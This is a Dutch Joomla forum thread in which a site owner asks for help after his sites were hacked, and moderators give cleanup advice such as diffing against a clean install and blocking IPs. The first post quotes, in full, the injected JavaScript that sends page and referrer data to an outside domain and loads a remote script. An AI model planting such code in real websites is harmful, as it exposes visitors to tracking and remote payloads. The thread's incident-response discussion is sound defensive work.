Welkom bij Joomla!NL

Om alle mogelijkheden van dit forum te kunnen gebruiken, moet je je eerst registreren.

Vermeld in iedere vraag duidelijk:
  1. De versie van Joomla! 3.X die je gebruikt
  2. De volledige url van je website indien mogelijk.
  3. De versie van de extensie waar de vraag over gaat.
Maak altijd een backup!

sites gehackt

sites gehackt

30 nov 2015 14:46
#1
Vorige week al melding hiervan gemaakt en dacht dat het opglost was. Nadat ik de hele vrijdag aan het zoeken ben geweest met de hoster naar waarom er zoveel emailverkeer is van twee door mij gebouwde sites kwamen wij er achter dat er een soort van mallware in zat.
de besmetten files (allemaal de index.PHP) van alle templates stond een stukje code in wat ik hieronder laat zien
Code:
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.fruticubaofmiami.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
Nadat ik deze rommel uit die files had gehaald stopte het mailverkeer. Heb vervolgens een nieuwe backup gemaakt en de wachtwoorden voor backend en ftp veranderd. Nu echter op zondag zijn alle twee de site weer vervuild met diezelfde soort code in de index.php van de templates. Ergens zal er wel een scriptje zitten wat zorgt dat dit telkens terug komt. Iemand enig idee waar ik dat zou kunnen vinden?
Gr
Hans
  • vzodjoomla
  • vzodjoomla's berichtenfoto Heeft onderwerp gestart
  • Bekend met Joomla!NL
  • Bekend met Joomla!NL
  • Berichten: 128

sites gehackt

30 nov 2015 14:54
#2
Ik heb je andere draadje gesloten omdat crossposten hier verboden is. Maar zie mijn reactie #6 in dat draadje.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725
Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

  • Astrid
  • Astrid's Profielfoto
  • Moderator + Technisch team
  • Moderator + Technisch team
  • Berichten: 37103

sites gehackt

30 nov 2015 15:02
#3
Sorry als dat verkeerd is gegaan, maar ik dacht toch echt dat ik een nieuw onderwerp had aangemaakt.
In dat draadje stel je voor om helemaal opnieuw te beginnen maar dat is eigenlijk geen optie. een van die twee sites zitten duizenden artikelen via VM. Is er dan geen mogelijkheid om een site te scannen en die meteen die rotzooi verwijderd?
De site waar VM in is geinstaleerd is een zakelijke de andere vrijwilligerswerk. Die wil ik eerst aanpakken. Dat helemaal opnieuw opbouwen kost veel te veel tijd. Straks raken meer sites besmet en dat wordt toch ondoenlijk op die manier. Telkens backups terug zetten die weer opnieuw besmet raken schiet niet echt op. Iemand een oplossing?
  • vzodjoomla
  • vzodjoomla's berichtenfoto Heeft onderwerp gestart
  • Bekend met Joomla!NL
  • Bekend met Joomla!NL
  • Berichten: 128

sites gehackt

30 nov 2015 15:08
#4
Ja, je hebt nu een nieuw onderwerp aangemaakt voor een vraag die al liep en waar je dus niet meer teruggekoppeld hebt.

Je kunt ze op laten schonen door myjoomla of sucuri .
Of mijn advies in dit draadje volgen.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst.
Vragen uitsluitend via dit forum.
yndi.nl - kvk 17157725
Is je vraag beantwoord? Dan kan je het draadje zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

  • Astrid
  • Astrid's Profielfoto
  • Moderator + Technisch team
  • Moderator + Technisch team
  • Berichten: 37103

sites gehackt

30 nov 2015 16:07 - 30 nov 2015 16:08
#5
Of je doet het zelf. In 99% van de gevallen zit de besmetting in de bestanden en niet in de database. Ga als volgt te werk:

- Plaats een backup van je besmetten site in een map (bv oud) op je bureaublad.
- Plaats een backup van een schone installatie inclusief alle geinstalleerde extensies in een andere map (bv nieuw) op je bureaublad
- Download WinMerge en installeer dit op je PC.
- Vergelijk de mappen met WinMerge met elkaar en los de problemen die je tegenkomt stuk voor stuk op.
Succes!
Laatst bewerkt 30 nov 2015 16:08 door Otto.
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker

sites gehackt

30 nov 2015 16:12
#6
Hoi Otto,
Dat zou een idee zijn maar dat programma is er alleen voor windows, is er zoiets ook voor mac?
  • vzodjoomla
  • vzodjoomla's berichtenfoto Heeft onderwerp gestart
  • Bekend met Joomla!NL
  • Bekend met Joomla!NL
  • Berichten: 128

sites gehackt

30 nov 2015 16:24 - 30 nov 2015 16:24
#7
Hoi Hans,

Voor Apple kun je FileMerge gebruiken.

'Quick and dirty' is ook even het Apache log van je server downloaden, in Excel openen en kijken naar alle POST entries.
Vaak worden de besmette bestanden aangeroepen op deze manier. Dit is echter geen 100% garantie.
Laatst bewerkt 30 nov 2015 16:24 door Otto.
  • Otto
  • Otto's Profielfoto
  • Bezoeker
  • Bezoeker

sites gehackt

04 dec 2015 17:24
#8
Hoi Allemaal,
Ik heb op een gehackte site RSFirewall geinstaleerd en die heeft wat rare dingen ontdekt wat misschien wel de oorzaak van het telkens opnieuw besmetten van de templates tot gevolg had. Heeft iemand enig idee van de file license.php in de root van een joomlasite te maken heeft, volgens mij is dat een bestandje wat helemaal niet thuis hoort in de root. Ik ga dat bestand in ieder geval even hernoemen en kijken wat het resultaat is. Graag jullie reactie.
Alvast bedankt
Hans
  • vzodjoomla
  • vzodjoomla's berichtenfoto Heeft onderwerp gestart
  • Bekend met Joomla!NL
  • Bekend met Joomla!NL
  • Berichten: 128

sites gehackt

04 dec 2015 18:46
#9
Licence.php hoort daar inderdaad niet. Wel LICENCE.TXT
Maar die vraag had je ook zelf kunnen beantwoorden door even een schone installatie ergens te plaatsen en te ontdekken dat het php-bestand er niet hoort.
Met vriendelijke groet,
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum.
Wil je Joomla!NL steunen? Dat kan met een donatie.

  • WoodyF4u
  • WoodyF4u's Profielfoto
  • Moderator + Nieuwsteam
  • Moderator + Nieuwsteam
  • Berichten: 11168

sites gehackt

11 dec 2015 21:13
#10
Het heeft even geduurd maar ik denk dat ik de oplossing gevonden heb.
Het voert te ver om op dit forum hier helemaal verslag van te doen, maar het komt er in het kort op neer dat alleen die files verwijderen die besmet zijn niet afdoende is. Ze zullen terug keren na een paar dagen is mijn ervaring. De IP adressen moeten geblokt worden met een firewall. Op mijn site: www.hansnl.nl/joomlasites-bouwen-onderho...site-gehacked-hacked
Heb ik mijn ervaringen van de afgelopen dagen geschreven.

Dank aan alle meedenkers
  • vzodjoomla
  • vzodjoomla's berichtenfoto Heeft onderwerp gestart
  • Bekend met Joomla!NL
  • Bekend met Joomla!NL
  • Berichten: 128

sites gehackt

11 dec 2015 21:20
#11
Toch kan je er op wachten dat het weer mis gaat zolang je niet je sites up-to-date houd.
Je draait nog steeds op de onveilige versie van joomla!! :ohmy:

GNU General Public License version 2 or later; see LICENSE.txt</license><version>3.4.4</version>

Groeten, Jelle
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens.
Vragen uitsluitend via dit Forum.
Is je vraag opgelost? Dan kan je hem zelf sluiten .
Wil je Joomla!NL steunen? Dat kan met een donatie.

  • Jelle
  • Jelle's Profielfoto
  • Algemeen Moderator
  • Algemeen Moderator
  • Berichten: 13589

sites gehackt

11 dec 2015 21:26
#12
Hoi Jelle,

Ja dat klopt, die site waar mijn verslagje op staat moet nog worden geupdated. Maar dat is gelukkig niet de site waar ik het over heb. die zijn inmiddels wel up to date. Maar ook dan blijven de hackers het proberen. Gezien het feit dat de firewall dit tegen houd moet je constant de zaken in de gaten houden.
Met mijn 20 sites voor verenigingen heb ik hier op dit moment mijn handen aan vol.
GR
Hans
  • vzodjoomla
  • vzodjoomla's berichtenfoto Heeft onderwerp gestart
  • Bekend met Joomla!NL
  • Bekend met Joomla!NL
  • Berichten: 128
Moderators: PeterJuliank92JelleRomke
Tijd voor maken pagina: 1.478 seconden

Wil je Joomla!NL steunen?

Steun Joomla!NLAlle teamleden werken enthousiast, op vrijwillige basis, mee aan Joomla!NL. Maar een website met forum kost nu eenmaal geld. Dus als je Joomla!NL wilt steunen, dan kan dat, graag zelfs!

Lees hier meer informatie